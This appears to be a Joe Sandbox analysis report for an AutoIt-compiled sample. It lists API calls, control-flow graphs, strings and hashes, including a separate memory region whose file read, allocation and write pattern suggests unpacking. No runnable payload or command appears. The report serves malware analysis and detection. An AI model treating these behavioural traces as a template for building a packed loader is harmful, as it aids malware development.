                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                • Opcode ID: 96fac43c6466486316f606788d955ec984e182d7dfd9d045e66413a43caa748a
                                                                                                                • Instruction ID: 6aea2f5c004cdadb2a1f1dc0932aac86beaea9b3a9e2e067a3e2a74e3cf212bf
                                                                                                                • Opcode Fuzzy Hash: 96fac43c6466486316f606788d955ec984e182d7dfd9d045e66413a43caa748a
                                                                                                                • Instruction Fuzzy Hash: E521C7B1A29218AFDF00DFA8EC49B9DBBF4FB09700F01412AF910A62A0D7B54544AF91

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009A52F8,?,008E37AE,?), ref: 008E4724
                                                                                                                  • Part of subcall function 0090050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,008E7165), ref: 0090052D
                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008E71A8
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0091E8C8
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0091E909
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0091E947
                                                                                                                • _wcscat.LIBCMT ref: 0091E9A0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                • API String ID: 2673923337-2727554177
                                                                                                                • Opcode ID: cfc96508f73a7570e8be307aab5b918116f97dd21f401f9e956bf320d993423b
                                                                                                                • Instruction ID: a8a2b1392e19047047fb1d99faec8a9074f7853e7044a22854e6e1ff446d0d51
                                                                                                                • Opcode Fuzzy Hash: cfc96508f73a7570e8be307aab5b918116f97dd21f401f9e956bf320d993423b
                                                                                                                • Instruction Fuzzy Hash: 15718E7151C3019EC304EF69EC41AABBBE8FF96350F44092EF865C71A1DB709948DB92

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 008E3A50
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 008E3A5F
                                                                                                                • LoadIconW.USER32(00000063), ref: 008E3A76
                                                                                                                • LoadIconW.USER32(000000A4), ref: 008E3A88
                                                                                                                • LoadIconW.USER32(000000A2), ref: 008E3A9A
                                                                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008E3AC0
                                                                                                                • RegisterClassExW.USER32(?), ref: 008E3B16
                                                                                                                  • Part of subcall function 008E3041: GetSysColorBrush.USER32(0000000F), ref: 008E3074
                                                                                                                  • Part of subcall function 008E3041: RegisterClassExW.USER32(00000030), ref: 008E309E
                                                                                                                  • Part of subcall function 008E3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E30AF
                                                                                                                  • Part of subcall function 008E3041: InitCommonControlsEx.COMCTL32(?), ref: 008E30CC
                                                                                                                  • Part of subcall function 008E3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008E30DC
                                                                                                                  • Part of subcall function 008E3041: LoadIconW.USER32(000000A9), ref: 008E30F2
                                                                                                                  • Part of subcall function 008E3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008E3101
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                • API String ID: 423443420-4155596026
                                                                                                                • Opcode ID: 6feeb5f28c642d3d234d29ae19f4f496448e35a6f2221e7332b1f50856479133
                                                                                                                • Instruction ID: 1c2125c5f7c43b2c7665859c9983f089c96006bcbe7e202f3db2345b5e0b4c75
                                                                                                                • Opcode Fuzzy Hash: 6feeb5f28c642d3d234d29ae19f4f496448e35a6f2221e7332b1f50856479133
                                                                                                                • Instruction Fuzzy Hash: C3214B71E29708AFEB10DFA4EC09B9D7BB4FB09711F11012AE914A72B1D3B55A40AFC4

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 767 8e3633-8e3681 769 8e3683-8e3686 767->769 770 8e36e1-8e36e3 767->770 771 8e3688-8e368f 769->771 772 8e36e7 769->772 770->769 773 8e36e5 770->773 774 8e374b-8e3753 PostQuitMessage 771->774 775 8e3695-8e369a 771->775 777 8e36ed-8e36f0 772->777 778 91d0cc-91d0fa call 8f1070 call 8f1093 772->778 776 8e36ca-8e36d2 DefWindowProcW 773->776 784 8e3711-8e3713 774->784 782 91d154-91d168 call 942527 775->782 783 8e36a0-8e36a2 775->783 785 8e36d8-8e36de 776->785 779 8e3715-8e373c SetTimer RegisterWindowMessageW 777->779 780 8e36f2-8e36f3 777->780 813 91d0ff-91d106 778->813 779->784 789 8e373e-8e3749 CreatePopupMenu 779->789 786 8e36f9-8e370c KillTimer call 8e443a call 8e3114 780->786 787 91d06f-91d072 780->787 782->784 806 91d16e 782->806 790 8e36a8-8e36ad 783->790 791 8e3755-8e375f call 8e44a0 783->791 784->785 786->784 799 91d074-91d076 787->799 800 91d0a8-91d0c7 MoveWindow 787->800 789->784 795 91d139-91d140 790->795 796 8e36b3-8e36b8 790->796 807 8e3764 791->807 795->776 802 91d146-91d14f call 937c36 795->802 804 8e36be-8e36c4 796->804 805 91d124-91d134 call 942d36 796->805 808 91d097-91d0a3 SetFocus 799->808 809 91d078-91d07b 799->809 800->784 802->776 804->776 804->813 805->784 806->776 807->784 808->784 809->804 814 91d081-91d092 call 8f1070 809->814 813->776 818 91d10c-91d11f call 8e443a call 8e434a 813->818 814->784 818->776
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 008E36D2
                                                                                                                • KillTimer.USER32(?,00000001), ref: 008E36FC
                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008E371F
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E372A
                                                                                                                • CreatePopupMenu.USER32 ref: 008E373E
                                                                                                                • PostQuitMessage.USER32(00000000), ref: 008E374D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                • String ID: TaskbarCreated
                                                                                                                • API String ID: 129472671-2362178303
                                                                                                                • Opcode ID: ec5ac798aa0e65b503d5690956e9d10b847e44fb9d3b2cde72fc65b385421e26
                                                                                                                • Instruction ID: 9fb798af41a2d54b5ecaeb13beb515697bb503ebee8a42e43d3ea5d0b08b8fcd
                                                                                                                • Opcode Fuzzy Hash: ec5ac798aa0e65b503d5690956e9d10b847e44fb9d3b2cde72fc65b385421e26
                                                                                                                • Instruction Fuzzy Hash: 194114B2318589BBDB245F79EC0DBB93698FB57304F140128F602C72B1CA649E40B6A2

                                                                                                                Control-flow Graph

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                                                • API String ID: 1825951767-3513169116
                                                                                                                • Opcode ID: 4f16caee16024697d66709cc67acdeb18ce84b30ed1683d8ea9d79b391faab23
                                                                                                                • Instruction ID: 27788d316be69abb29f463c7add86cf7ed48d53851a9c238d6a4333081264a7a
                                                                                                                • Opcode Fuzzy Hash: 4f16caee16024697d66709cc67acdeb18ce84b30ed1683d8ea9d79b391faab23
                                                                                                                • Instruction Fuzzy Hash: 90A17F7191425DAACF05EBA9DC55AEEB778FF16304F400429F415F7191DF705A08CBA1

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1009 1671fd8-167202a call 1671ed8 CreateFileW 1012 1672033-1672040 1009->1012 1013 167202c-167202e 1009->1013 1016 1672053-167206a VirtualAlloc 1012->1016 1017 1672042-167204e 1012->1017 1014 167218c-1672190 1013->1014 1018 1672073-1672099 CreateFileW 1016->1018 1019 167206c-167206e 1016->1019 1017->1014 1020 16720bd-16720d7 ReadFile 1018->1020 1021 167209b-16720b8 1018->1021 1019->1014 1023 16720fb-16720ff 1020->1023 1024 16720d9-16720f6 1020->1024 1021->1014 1026 1672101-167211e 1023->1026 1027 1672120-1672137 WriteFile 1023->1027 1024->1014 1026->1014 1028 1672162-1672187 CloseHandle VirtualFree 1027->1028 1029 1672139-1672160 1027->1029 1028->1014 1029->1014
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0167201D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2160356077.0000000001671000.00000040.00000020.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1671000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                • Instruction ID: 102d2dbec9fae3262de225265ec5e17c5d47823cee47d93fd32b99b4b7b82694
                                                                                                                • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                • Instruction Fuzzy Hash: 1A510675A50209FBEB24DFA4CC99FDE7778BF48711F108508F70AAB280DA749645CB60

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1049 909ae6-909af2 call 903187 call 909d3c 1054 909af4-909afb call 909b5c 1049->1054 1055 909afc-909b0f call 909d8a 1049->1055 1055->1054 1060 909b11-909b19 call 9087d5 1055->1060 1062 909b1e-909b24 1060->1062 1063 909b53-909b5b call 909b5c 1062->1063 1064 909b26-909b36 call 909de6 1062->1064 1064->1063 1069 909b38-909b52 call 909a33 GetCurrentThreadId 1064->1069
                                                                                                                APIs
                                                                                                                • __init_pointers.LIBCMT ref: 00909AE6
                                                                                                                  • Part of subcall function 00903187: EncodePointer.KERNEL32(00000000), ref: 0090318A
                                                                                                                  • Part of subcall function 00903187: __initp_misc_winsig.LIBCMT ref: 009031A5
                                                                                                                  • Part of subcall function 00903187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00909EA0
                                                                                                                  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00909EB4
                                                                                                                  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00909EC7
                                                                                                                  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00909EDA
                                                                                                                  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00909EED
                                                                                                                  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00909F00
                                                                                                                  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00909F13
                                                                                                                  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00909F26
                                                                                                                  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00909F39
                                                                                                                  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00909F4C
                                                                                                                  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00909F5F
                                                                                                                  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00909F72
                                                                                                                  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00909F85
                                                                                                                  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00909F98
                                                                                                                  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00909FAB
                                                                                                                  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00909FBE
                                                                                                                • __mtinitlocks.LIBCMT ref: 00909AEB
                                                                                                                • __mtterm.LIBCMT ref: 00909AF4
                                                                                                                  • Part of subcall function 00909B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00909AF9,00907CD0,0099A0B8,00000014), ref: 00909C56
                                                                                                                  • Part of subcall function 00909B5C: _free.LIBCMT ref: 00909C5D
                                                                                                                  • Part of subcall function 00909B5C: DeleteCriticalSection.KERNEL32(0099EC00,?,?,00909AF9,00907CD0,0099A0B8,00000014), ref: 00909C7F
                                                                                                                • __calloc_crt.LIBCMT ref: 00909B19
                                                                                                                • __initptd.LIBCMT ref: 00909B3B
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00909B42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 3567560977-0
                                                                                                                • Opcode ID: 9b829665aa6babb97f229b4a942fe573719a94fe1976b6b20b861e6f5b0e76f3
                                                                                                                • Instruction ID: 305f387d6eb8972eef15ee007a5562c8d184bd679d070bd8ce32dd205db474cb
                                                                                                                • Opcode Fuzzy Hash: 9b829665aa6babb97f229b4a942fe573719a94fe1976b6b20b861e6f5b0e76f3
                                                                                                                • Instruction Fuzzy Hash: 4BF0903265D7115EE634B778BC0774B3B989F82774F204A1AF4A4D91D3EF61844151A0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1072 8e39d5-8e3a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008E3A03
                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008E3A24
                                                                                                                • ShowWindow.USER32(00000000,?,?), ref: 008E3A38
                                                                                                                • ShowWindow.USER32(00000000,?,?), ref: 008E3A41
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CreateShow
                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                • Opcode ID: 9515ccc353bea26e6d12f333844bb62b8466a90ff73461a8b7d10fc8f064ce2f
                                                                                                                • Instruction ID: 61a3c77d07039c38d9bc1f9e5e25cfeeb216708635c5cba455fd835eadf44e26
                                                                                                                • Opcode Fuzzy Hash: 9515ccc353bea26e6d12f333844bb62b8466a90ff73461a8b7d10fc8f064ce2f
                                                                                                                • Instruction Fuzzy Hash: E5F03A706256907EEA3067237C18F2B2E7DDBC7F50B02002EBE10A2170C6610800EAB0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1073 8e407c-8e4092 1074 8e416f-8e4173 1073->1074 1075 8e4098-8e40ad call 8e7a16 1073->1075 1078 91d3c8-91d3d7 LoadStringW 1075->1078 1079 8e40b3-8e40d3 call 8e7bcc 1075->1079 1082 91d3e2-91d3fa call 8e7b2e call 8e6fe3 1078->1082 1079->1082 1083 8e40d9-8e40dd 1079->1083 1092 8e40ed-8e416a call 902de0 call 8e454e call 902dbc Shell_NotifyIconW call 8e5904 1082->1092 1095 91d400-91d41e call 8e7cab call 8e6fe3 call 8e7cab 1082->1095 1085 8e4174-8e417d call 8e8047 1083->1085 1086 8e40e3-8e40e8 call 8e7b2e 1083->1086 1085->1092 1086->1092 1092->1074 1095->1092
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0091D3D7
                                                                                                                  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
                                                                                                                • _memset.LIBCMT ref: 008E40FC
                                                                                                                • _wcscpy.LIBCMT ref: 008E4150
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008E4160
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                • String ID: Line:
                                                                                                                • API String ID: 3942752672-1585850449
                                                                                                                • Opcode ID: 4a1c933cce7fc627bf584215a8adcf0e399601bdad31e6933caf4ef0ddc604b4
                                                                                                                • Instruction ID: 45a0110c8c1c4bad3a8c4e0d91620831684c601803b13d9d7ded1cb30d2dbfa9
                                                                                                                • Opcode Fuzzy Hash: 4a1c933cce7fc627bf584215a8adcf0e399601bdad31e6933caf4ef0ddc604b4
                                                                                                                • Instruction Fuzzy Hash: 2D31CD71108784AED721EB65DC4ABDB77D8FF96314F20452AF699C20A1EB709648CB83

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1108 90541d-905436 1109 905453 1108->1109 1110 905438-90543d 1108->1110 1111 905455-90545b 1109->1111 1110->1109 1112 90543f-905441 1110->1112 1113 905443-905448 call 908b28 1112->1113 1114 90545c-905461 1112->1114 1122 90544e call 908db6 1113->1122 1115 905463-90546d 1114->1115 1116 90546f-905473 1114->1116 1115->1116 1119 905493-9054a2 1115->1119 1120 905483-905485 1116->1120 1121 905475-905480 call 902de0 1116->1121 1125 9054a4-9054a7 1119->1125 1126 9054a9 1119->1126 1120->1113 1124 905487-905491 1120->1124 1121->1120 1122->1109 1124->1113 1124->1119 1127 9054ae-9054b3 1125->1127 1126->1127 1130 9054b9-9054c0 1127->1130 1131 90559c-90559f 1127->1131 1132 905501-905503 1130->1132 1133 9054c2-9054ca 1130->1133 1131->1111 1135 905505-905507 1132->1135 1136 90556d-90556e call 910ba7 1132->1136 1133->1132 1134 9054cc 1133->1134 1137 9054d2-9054d4 1134->1137 1138 9055ca 1134->1138 1139 905509-905511 1135->1139 1140 90552b-905536 1135->1140 1149 905573-905577 1136->1149 1144 9054d6-9054d8 1137->1144 1145 9054db-9054e0 1137->1145 1146 9055ce-9055d7 1138->1146 1147 905521-905525 1139->1147 1148 905513-90551f 1139->1148 1142 905538 1140->1142 1143 90553a-90553d 1140->1143 1142->1143 1150 9055a4-9055a8 1143->1150 1151 90553f-90554b call 9046e6 call 910e5b 1143->1151 1144->1145 1145->1150 1152 9054e6-9054ff call 910cc8 1145->1152 1146->1111 1153 905527-905529 1147->1153 1148->1153 1149->1146 1154 905579-90557e 1149->1154 1155 9055ba-9055c5 call 908b28 1150->1155 1156 9055aa-9055b7 call 902de0 1150->1156 1169 905550-905555 1151->1169 1168 905562-90556b 1152->1168 1153->1143 1154->1150 1159 905580-905591 1154->1159 1155->1122 1156->1155 1160 905594-905596 1159->1160 1160->1130 1160->1131 1168->1160 1170 90555b-90555e 1169->1170 1171 9055dc-9055e0 1169->1171 1170->1138 1172 905560 1170->1172 1171->1146 1172->1168
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 1559183368-0
                                                                                                                • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                • Instruction ID: bc91a92fe4fcfbce5c6b19d9129cd97b62f5e073403529d4a41b79915a351c8d
                                                                                                                • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                • Instruction Fuzzy Hash: 8F51B370A00B05DFDF249F69DC806AF77AAAF41321F258B29F825962D1D7759D908F40
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009A52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008E4E0F
                                                                                                                • _free.LIBCMT ref: 0091E263
                                                                                                                • _free.LIBCMT ref: 0091E2AA
                                                                                                                  • Part of subcall function 008E6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008E6BAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                • API String ID: 2861923089-1757145024
                                                                                                                • Opcode ID: bd1455cde96a76f0e648419fc028e10c7cc0dc4f6c65ee21d054cfd95a4cb802
